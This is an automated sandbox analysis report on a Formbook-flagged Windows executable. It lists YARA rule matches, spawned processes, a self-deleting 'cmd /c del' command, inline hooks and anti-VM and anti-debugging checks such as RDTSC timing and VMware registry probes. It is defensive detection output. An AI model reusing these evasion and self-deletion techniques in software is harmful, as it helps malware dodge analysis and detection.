          Source: 00000000.00000002.668132085.0000000003FD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.668132085.0000000003FD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.704845326.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.704845326.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.65BV6gbGFl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.65BV6gbGFl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.65BV6gbGFl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.65BV6gbGFl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 65BV6gbGFl.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@5/4
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\65BV6gbGFl.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_01
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeMutant created: \Sessions\1\BaseNamedObjects\UkPkTE
          Source: 65BV6gbGFl.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 65BV6gbGFl.exeVirustotal: Detection: 34%
          Source: unknownProcess created: C:\Users\user\Desktop\65BV6gbGFl.exe 'C:\Users\user\Desktop\65BV6gbGFl.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\65BV6gbGFl.exe C:\Users\user\Desktop\65BV6gbGFl.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\65BV6gbGFl.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess created: C:\Users\user\Desktop\65BV6gbGFl.exe C:\Users\user\Desktop\65BV6gbGFl.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\65BV6gbGFl.exe'
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 65BV6gbGFl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 65BV6gbGFl.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.677864614.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 65BV6gbGFl.exe, 00000001.00000002.705832250.00000000012CF000.00000040.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1009183411.000000000394F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 65BV6gbGFl.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.677864614.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 0_2_06216DEC push eax; ret
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 0_2_0621CA49 push B9FFFFFDh; retn 0002h
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 0_2_06305D6C pushfd ; iretd
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 0_2_06305BB0 push eax; iretd
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 0_2_0630C009 push es; iretd
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_004169BB push esi; ret
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0040AB07 push ds; retf
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_00414E05 push ss; retf
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0041CEF2 push eax; ret
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0041CEFB push eax; ret
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0041CEA5 push eax; ret
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0041CF5C push eax; ret
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0122D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038AD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DB69BB push esi; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DAAB07 push ds; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DBCEFB push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DBCEF2 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DBCEA5 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DB4E05 push ss; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DBCF5C push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.4280270646

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE5
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.666713130.0000000002FD1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 65BV6gbGFl.exe PID: 6372, type: MEMORY
          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: 65BV6gbGFl.exe, 00000000.00000002.666713130.0000000002FD1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: 65BV6gbGFl.exe, 00000000.00000002.666713130.0000000002FD1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: 65BV6gbGFl.exe, 00000000.00000002.666713130.0000000002FD1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000DA98E4 second address: 0000000000DA98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000DA9B4E second address: 0000000000DA9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\65BV6gbGFl.exe TID: 6392Thread sleep time: -52961s >= -30000s
          Source: C:\Users\user\Desktop\65BV6gbGFl.exe TID: 6420Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6516Thread sleep count: 57 > 30
          Source: C:\Windows\explorer.exe TID: 6516Thread sleep time: -114000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6948Thread sleep time: -100000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: 65BV6gbGFl.exe, 00000000.00000002.666447719.0000000001482000.00000004.00000020.sdmpBinary or memory string: VMware
          Source: 65BV6gbGFl.exe, 00000000.00000002.666713130.0000000002FD1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000000.687367031.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.676467519.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: 65BV6gbGFl.exe, 00000000.00000002.666713130.0000000002FD1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: 65BV6gbGFl.exe, 00000000.00000002.666713130.0000000002FD1000.00000004.00000001.sdmpBinary or memory string: k%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000000.687912713.000000000A9D6000.00000004.00000001.sdmpBinary or memory string: 0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAk
          Source: explorer.exe, 00000002.00000000.679961109.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.687482352.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAZ
          Source: 65BV6gbGFl.exe, 00000000.00000002.666447719.0000000001482000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareNZLRBY9VWin32_VideoControllerFUEA5496VideoController120060621000000.000000-0005382.895display.infMSBDAE7BH6XKDPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsFUFGRSW8LMEMp
          Source: explorer.exe, 00000002.00000000.687367031.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 65BV6gbGFl.exe, 00000000.00000002.666447719.0000000001482000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareNZLRBY9VWin32_VideoControllerFUEA5496VideoController120060621000000.000000-0005382.895display.infMSBDAE7BH6XKDPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsFUFGRSW8
          Source: 65BV6gbGFl.exe, 00000000.00000002.666713130.0000000002FD1000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000002.00000002.1016765431.0000000004755000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000002.00000000.687482352.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000002.00000000.676467519.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.676467519.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: 65BV6gbGFl.exe, 00000000.00000002.666713130.0000000002FD1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000002.00000000.687532349.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: 65BV6gbGFl.exe, 00000000.00000002.666713130.0000000002FD1000.00000004.00000001.sdmpBinary or memory string: k"SOFTWARE\VMware, Inc.\VMware Tools
          Source: 65BV6gbGFl.exe, 00000000.00000002.666713130.0000000002FD1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000002.00000000.676467519.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0040ACC0 LdrLoadDll,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011DC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01202990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01257016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01257016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01257016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01292073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012020A0 mov eax, dword ptr fs:[00000030h]
